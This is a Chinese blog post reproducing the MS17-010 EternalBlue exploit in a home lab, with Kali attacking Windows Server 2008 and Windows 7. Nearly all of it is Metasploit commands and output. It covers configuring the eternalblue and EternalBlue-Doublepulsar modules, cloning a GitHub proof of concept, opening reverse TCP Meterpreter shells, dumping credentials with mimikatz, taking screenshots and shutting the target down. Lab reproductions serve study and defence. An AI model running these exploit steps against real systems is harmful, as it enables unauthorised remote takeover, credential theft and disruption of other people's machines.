MS17-010(永恒之蓝)漏洞复现
程序员文章站
2022-07-15 14:14:54
...
漏洞来源
永恒之蓝是2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布的一大批网络攻击工具中的其中一个。“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒。
漏洞复现
实验一:获取windows server 2008的shell
实验环境:攻击机:kali 靶机:windows server 2008
kali IP:192.168.3.129 win 2008 IP:192.168.3.128
aaa@qq.com:~# msfconsole
[-] ***rting the MetaSploit Framework console.../
...
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set processname lsass.exe
processname => lsass.exe
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.3.129
lhost => 192.168.3.129
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.3.128
rhost => 192.168.3.128
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 192.168.3.129:4444
[*] 192.168.3.128:445 - Connecting to target for exploitation.
[+] 192.168.3.128:445 - Connection established for exploitation.
[+] 192.168.3.128:445 - Target OS selected valid for OS indicated by SMB reply
...
攻击过程中win 2008有可能出现异常,也有可能自动重启,说明正在受到攻击。如果攻击断开,再次攻击便可获取到shell
...
[*] Meterpreter session 1 opened (192.168.3.129:4444 -> 192.168.3.128:49171) at 2019-03-21 01:39:37 -0400
[+] 192.168.3.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.3.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.3.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= #成功反弹回Shell
meterpreter > sysinfo
Computer : WIN-EAITJB2839O
OS : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture : x64
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > ipconfig
...
Interface 11
============
Name : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:7c:56:f5
MTU : 1500
IPv4 Address : 192.168.3.128
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::a96b:5b14:1c0e:bbd6
IPv6 Netmask : ffff:ffff:ffff:ffff::
...
meterpreter > load mimikatz
Loading extension mimikatz...[!] Loaded Mimikatz on a newer OS (Windows 2008 R2 (Build 7601, Service Pack 1).). Did you mean to 'load kiwi' instead?
Success.
meterpreter > wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;996 Negotiate WORKGROUP WIN-EAITJB2839O$
0;47050 NTLM
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;999 NTLM WORKGROUP WIN-EAITJB2839O$
0;297281 NTLM WIN-EAITJB2839O canlang 45 76 bb da
0;297231 NTLM WIN-EAITJB2839O canlang 45 76 bb da
0;697530 NTLM WIN-EAITJB2839O Administrator aaa@qq.com
meterpreter >
实验二:使用github上的POC攻击win7-x86(32位),获取shell
实验环境:攻击机:kali 靶机:win 7-x86
kali IP:192.168.43.133 win 7IP:192.168.43.161
虽然kali-2017-01自带ms2017_010_eternalblue攻击模块,但却只能攻击Windows 7(x64) and Server 2008 R2 (x64),用github上被人的POC进行实验。
1. 到github上下载POC
aaa@qq.com:~# cd Desktop/MSF-hrack/
aaa@qq.com:~/Desktop/MSF-hrack# git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
fatal: destination path 'Eternalblue-Doublepulsar-Metasploit' already exists and is not an empty directory.
aaa@qq.com:~/Desktop/MSF-hrack# cp -r Eternalblue-Doublepulsar-Metasploit/* /usr/share/metasploit-framework/modules/exploits/windows/smb/ #拷贝到msf的攻击模块
aaa@qq.com:~/Desktop/MSF-hrack#
2. 使用msf调用永恒之蓝对靶机进行攻击
如果没有安装wine32,则先要安装:
aaa@qq.com:~# dpkg --add-architecture i386 && apt-get update &&
apt-get install wine32
aaa@qq.com:~/Desktop/MSF-hrack# service postgresql start
aaa@qq.com:~/Desktop/MSF-hrack# msfconsole
_---------.
.' ####### ;."
.---,. ;@ @@`; .---,..
." @@@@@'.,'@@ @@@@@',.'@@@@ ".
'aaa@qq.com@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
`aaa@qq.com@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
"--'aaa@qq.com@@ aaa@qq.com @ ,'- .'--"
"aaa@qq.com' ; @ @ `. ;'
|@@@@ @@@ @ .
' @@@ @@ @@ ,
`aaa@qq.com@@@ @@ .
',@@ @ ; _____________
( 3 C ) /|___ / Metasploit! \
;@'. __*__,." \|--- \_____________/
'(.,...."/
=[ metasploit v4.16.30-dev ]
+ -- --=[ 1722 exploits - 986 auxiliary - 300 post ]
+ -- --=[ 507 payloads - 40 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use exploit/windows/smb/eternalblue_doublepulsar
msf exploit(windows/smb/eternalblue_doublepulsar) > set doublepulsarpath '/root/Desktop/MSF-hrack/Eternalblue-Doublepulsar-Metasploit/deps'
doublepulsarpath => /root/Desktop/MSF-hrack/Eternalblue-Doublepulsar-Metasploit/deps
msf exploit(windows/smb/eternalblue_doublepulsar) > set eternalbluepath '/root/Desktop/MSF-hrack/Eternalblue-Doublepulsar-Metasploit/deps'
eternalbluepath => /root/Desktop/MSF-hrack/Eternalblue-Doublepulsar-Metasploit/deps
msf exploit(windows/smb/eternalblue_doublepulsar) > set processinject lsass.exe
processinject => lsass.exe
msf exploit(windows/smb/eternalblue_doublepulsar) > set targetarchitecture x86
targetarchitecture => x64
msf exploit(windows/smb/eternalblue_doublepulsar) > set rhost 192.168.43.161
rhost => 192.168.43.161
msf exploit(windows/smb/eternalblue_doublepulsar) > show targets
Exploit targets:
Id Name
-- ----
0 Windows XP (all services pack) (x86) (x64)
1 Windows Server 2003 SP0 (x86)
2 Windows Server 2003 SP1/SP2 (x86)
3 Windows Server 2003 (x64)
4 Windows Vista (x86)
5 Windows Vista (x64)
6 Windows Server 2008 (x86)
7 Windows Server 2008 R2 (x86) (x64)
8 Windows 7 (all services pack) (x86) (x64)
msf exploit(windows/smb/eternalblue_doublepulsar) > set target 8
target => 8
msf exploit(windows/smb/eternalblue_doublepulsar) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/eternalblue_doublepulsar) > set lhost 192.168.43.133
lhost => 192.168.43.133
msf exploit(windows/smb/eternalblue_doublepulsar) > show options
Module options (exploit/windows/smb/eternalblue_doublepulsar):
Name Current Setting Required Description
---- --------------- -------- -----------
DOUBLEPULSARPATH /root/Desktop/MSF-hrack/Eternalblue-Doublepulsar-Metasploit/deps yes Path directory of Doublepulsar
ETERNALBLUEPATH /root/Desktop/MSF-hrack/Eternalblue-Doublepulsar-Metasploit/deps yes Path directory of Eternalblue
PROCESSINJECT lsass.exe yes Name of process to inject into (Change to lsass.exe for x64)
RHOST 192.168.43.161 yes The target address
RPORT 445 yes The SMB service port (TCP)
TARGETARCHITECTURE x64 yes Target Architecture (Accepted: x86, x64)
WINEPATH /root/.wine/drive_c/ yes WINE drive_c path
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.43.133 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
8 Windows 7 (all services pack) (x86) (x64)
msf exploit(windows/smb/eternalblue_doublepulsar) > run
[*] Started reverse TCP handler on 192.168.43.133:4444
[*] 192.168.43.161:445 - Generating Eternalblue XML data
[*] 192.168.43.161:445 - Generating Doublepulsar XML data
[*] 192.168.43.161:445 - Generating payload DLL for Doublepulsar
[*] 192.168.43.161:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.43.161:445 - Launching Eternalblue...
[-] Error getting output back from Core; aborting...
[-] 192.168.43.161:445 - Are you sure it's vulnerable?
[*] 192.168.43.161:445 - Launching Doublepulsar...
[-] 192.168.43.161:445 - Oops, something was wrong!
[*] Exploit completed, but no session was created.
msf exploit(windows/smb/eternalblue_doublepulsar) > sessions -i
Active sessions
===============
No active sessions.
msf exploit(windows/smb/eternalblue_doublepulsar) > set processinject explorer.exe
processinject => explorer.exe
msf exploit(windows/smb/eternalblue_doublepulsar) > run
[*] Started reverse TCP handler on 192.168.43.133:4444
[*] 192.168.43.161:445 - Generating Eternalblue XML data
[*] 192.168.43.161:445 - Generating Doublepulsar XML data
[*] 192.168.43.161:445 - Generating payload DLL for Doublepulsar
[*] 192.168.43.161:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.43.161:445 - Launching Eternalblue...
[-] Error getting output back from Core; aborting...
[-] 192.168.43.161:445 - Are you sure it's vulnerable?
[*] 192.168.43.161:445 - Launching Doublepulsar...
[-] 192.168.43.161:445 - Oops, something was wrong!
[*] Exploit completed, but no session was created.
msf exploit(windows/smb/eternalblue_doublepulsar) >
并没有拿下win 7的shell,原因:win7没有关闭防火墙
关闭win 7防火墙,再次攻击:
msf exploit(windows/smb/eternalblue_doublepulsar) > run
[*] Started reverse TCP handler on 192.168.43.133:4444
[*] 192.168.43.161:445 - Generating Eternalblue XML data
[*] 192.168.43.161:445 - Generating Doublepulsar XML data
[*] 192.168.43.161:445 - Generating payload DLL for Doublepulsar
[*] 192.168.43.161:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.43.161:445 - Launching Eternalblue...
[+] 192.168.43.161:445 - Backdoor is already installed
[*] 192.168.43.161:445 - Launching Doublepulsar...
[*] Sending stage (205891 bytes) to 192.168.43.161
[*] Meterpreter session 3 opened (192.168.43.133:4444 -> 192.168.43.161:50630) at 2019-03-11 05:39:00 -0400
[+] 192.168.43.161:445 - Remote code executed... 3... 2... 1...
meterpreter > ifconfig
Interface 1
============
Name : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
Interface 11
============
Name : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:3c:60:ad
MTU : 1500
IPv4 Address : 192.168.43.161
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::3d78:37a1:f9ae:35
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 12
============
Name : Microsoft ISATAP Adapter
Hardware MAC : 00:00:00:00:00:00
MTU : 1280
IPv6 Address : fe80::5efe:c0a8:2ba1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
Interface 13
============
Name : Teredo Tunneling Pseudo-Interface
Hardware MAC : 00:00:00:00:00:00
MTU : 1280
IPv6 Address : fe80::100:7f:fffe
IPv6 Netmask : ffff:ffff:ffff:ffff::
meterpreter > screenshot
Screenshot saved to: /root/ltsRJHfE.jpeg
meterpreter > shutdown -s -t 100
Shutting down...
meterpreter >
成功拿到shell
上一篇: eclipse字体问题
下一篇: StarUML2 全平台破解方法